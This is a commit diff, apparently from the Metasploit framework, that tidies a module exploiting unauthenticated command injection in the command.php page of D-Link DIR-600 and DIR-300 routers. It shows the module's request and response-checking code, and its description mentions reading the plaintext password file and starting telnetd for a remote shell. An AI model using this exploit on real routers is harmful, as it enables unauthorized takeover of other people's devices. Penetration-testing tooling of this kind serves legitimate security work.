little cleanup plus msftidy compliant

2013-02-13 20:24:49 +01:00 · 2013-02-13 20:24:49 +01:00 · d1784babea
parent 63c6791473
commit d1784babea
1 changed files with 18 additions and 17 deletions
--- a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb
+++ b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb
@ -15,20 +15,22 @@ class Metasploit3 < Msf::Auxiliary
 		super(update_info(info,
 			'Name'            => 'D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution',
 			'Description'     => %q{
-					Some D-Link Routers like the DIR-600 rev B and the DIR-300 rev B are 
-				vulnerable to OS Command injection.
-				You do not need credentials to the webinterface because the command.php
-				is accesseble without authentication. You could read the plaintext password
-				file. Tested versions: DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.
-				Hint: To get a remote shell you could start the telnetd without any authentication. 
+					This module exploits an OS Command Injection vulnerability in some D-Link
+				Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in
+				command.php, which is accessible without authentication. This module has been
+				tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.
+				In order to get a remote shell the telnetd could be started without any
+				authentication.
 			},
 			'Author'          => [ 'm-1-k-3' ],
 			'License'         => MSF_LICENSE,
 			'References'      =>
 				[
-					[ 'URL', 'http://www.dlink.de/cs/Satellite?c=Product_C&childpagename=DLinkEurope-DE%2FDLTechProduct&cid=1197381489628&p=1197318958220&packedargs=QuickLinksParentID%3D1197318958220%26locale%3D1195806663795&pagename=DLinkEurope-DE%2FDLWrapper' ],
+					[ 'OSVDB', '89861' ],
+					[ 'EDB', '24453' ],
+					[ 'URL', 'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router' ],
 					[ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ],
-					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ],
+					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ]
 				],
 			'DefaultTarget'  => 0,
 			'DisclosureDate' => 'Feb 04 2013'))
@ -52,23 +54,22 @@ class Metasploit3 < Msf::Auxiliary
 				{
 					'uri'    => uri,
 					'method' => 'POST',
-					'data'     => data_cmd,
+					'data'   => data_cmd
 				})
-			return :abort if res.nil?
-			return :abort if (res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ HTTP\/1.1,\ DIR/)
-			return :abort if (res.code == 404)
-		
+			return if res.nil?
+			return if (res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ HTTP\/1.1,\ DIR/)
+			return if res.code == 404
 		rescue ::Rex::ConnectionError
 			vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
 			return
 		end
-		
-		if res.body.include? "end"
-			print_status("#{rhost}:#{rport} - Exploited successfully\n")
+
+		if res.body.include?("end")
+			print_good("#{rhost}:#{rport} - Exploited successfully\n")
 			print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
 			print_line("#{rhost}:#{rport} - Output: #{res.body}")
 		else
-			print_status("#{rhost}:#{rport} - Exploit failed.")
+			print_error("#{rhost}:#{rport} - Exploit failed.")
 		end
 	end
 end